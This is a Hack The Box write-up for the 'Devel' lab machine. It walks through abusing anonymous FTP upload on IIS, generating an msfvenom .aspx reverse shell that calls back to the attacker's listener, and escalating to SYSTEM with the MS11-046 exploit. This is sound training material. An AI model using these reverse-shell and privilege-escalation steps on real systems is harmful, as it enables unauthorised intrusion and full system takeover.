Posts Hack The Box - Devel Writeup
Post
Cancel

Hack The Box - Devel Writeup

Devel Logo

IPOSDifficultyRelease Date
10.10.10.5WindowsEasy15 March 2017

Enumeration

As with any machine on HackTheBox the first step is to run an nmap scan to find open ports and running services.

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
kali@kali:~$ nmap -sC -sV 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 11:19 EDT
Nmap scan report for 10.10.10.5
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.87 seconds

Working directory

While nmap is running we should create a directory to keep all of our files for this box organised. We can make a new folder on the desktop by running the command mkdir /home/kali/Desktop/Devel.

FTP

The nmap scan reveals there is an open FTP service running with anonymous login enabled. nmap shows the directory listing for the anonymous user. The files in this structure look like startpage for a Microsoft IIS web server.

HTTP

Opening the host in the browser confirms what the FTP server shows. The page opens to an IIS start page.

FTP Server

Connecting to FTP

Using the built in Linux commands we can connect to the server. cd into our working directory and connect by running the command ftp 10.10.10.5. When asked for a username we can connect with the name anonymous. The server then asks for an e-mail address as a password. This can be ignored and left empty.

Testing file upload

Now that we are connected we should test file upload. Open a new terminal session and cd into our working directory again and create a new file with the command touch test.txt. This creates an empty file with the name test.txt.

Back on the terminal session we connected to the FTP server, upload the file to the server using the command put test.txt. The server should respond with the file has been uploaded successfully.

Once the file has been uploaded to the FTP server we can check if the FTP server is connected to the web server by going to http://10.10.10.5/test.txt. If successful this should load a blank page instead of an error page. Signifying we have file upload.

Exploiting file upload

Now that we have established we have file upload capabilities we can exploit this to open a reverse shell.

Generating reverse shell payload (MSFVenom)

To establish a connection for our reverse shell we will use a .aspx payload generated via MSFVenom using the command below, setting the LHOST and LPORT for our kali machine IP.

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=4455 -f aspx > shell.aspx

Upload shell.aspx

with our shell.aspx file generated we can now upload this file the same way as our test.txt file.

  • ftp 10.10.10.5
  • Login with user anonymous
  • put shell.aspx

Open netcat listener

To receive the connection from the reverse shell we need to open a netcat listening session. Open a new terminal session and run the command nc -nvlp 4455. Using the same port number used in the MSFVenom payload.

Establish shell connection

With the payload uploaded via FTP and our listener open. We can establish our connection by navigating to http://10.10.10.5/shell.aspx in a web browser.

After a few moments our netcat listener will show the output below.

1
2
3
4
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>

We now have shell access to the box as the inet user.

Privilege escalation

With shell access to the box we can now enumerate the system to find our path to Administrator access.

Watson

To find if there are any available kernel exploits for this build of windows we will upload and run Watson.

  • Download WatsonNet3.5AnyCPU.exe from the GitHub repo
  • Copy this file to our working directory
  • IMPORTANT - on our ftp session set the mode to binary by running the command binary
  • Upload the file with put WatsonNet3.5AnyCPU.exe
  • On our reverse shell session set our directory to the IIS document root with cd /inetpub/wwwroot/
  • Run watston with WatsonNet3.5AnyCPU.exe

After a few moments we should see the output below. Watson has found several vulnerabilities for this build of windows and suggests available exploits.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
WatsonNet3.5AnyCPU.exe
  __    __      _                   
 / / /\ \ \__ _| |_ ___  ___  _ __  
 \ \/  \/ / _` | __/ __|/ _ \| '_ \ 
  \  /\  / (_| | |_\__ \ (_) | | | |
   \/  \/ \__,_|\__|___/\___/|_| |_|
                                   
                           v0.1    
                                   
                  Sherlock sucks...
                   @_RastaMouse

 [*] OS Build number: 7600
 [*] CPU Address Width: 32
 [*] Process IntPtr Size: 4
 [*] Using Windows path: C:\WINDOWS\System32

  [*] Appears vulnerable to MS10-073
   [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel.
   [>] Exploit: https://www.exploit-db.com/exploits/36327/
   [>] Notes: None.

  [*] Appears vulnerable to MS10-092
   [>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb
   [>] Notes: None.

  [*] Appears vulnerable to MS11-046
   [>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges.
   [>] Exploit: https://www.exploit-db.com/exploits/40564/
   [>] Notes: None.

  [*] Appears vulnerable to MS12-042
   [>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode.
   [>] Exploit: https://www.exploit-db.com/exploits/20861/
   [>] Notes: None.

  [*] Appears vulnerable to MS13-005
   [>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
   [>] Notes: None.

 [*] Finished. Found 5 vulns :)

Exploiting MS11-046

After looking through the exploits Watson suggested. We will use the MS11-046 (CVE-2011-1249) exploit as we are trying to complete this box without using metasploit.

  • Download The exploit from the SecWiki GitHub Repo
  • Copy ms11-046.exe to the working directory
  • Make sure the FTP session is still in binary mode
  • Upload with put ms11-046.exe
  • Run the exploit in our shell session by running ms11-046.exe in the /inetpub/wwwroot folder.

The exploit will run but will not show any output. To check if the exploit was successful, we can run the command whoami. Which should reveal we are now running as nt authority\system.

This box is now completed and the user and root flags can be found in their respective Users folder.

This post is licensed under CC BY 4.0 by the author.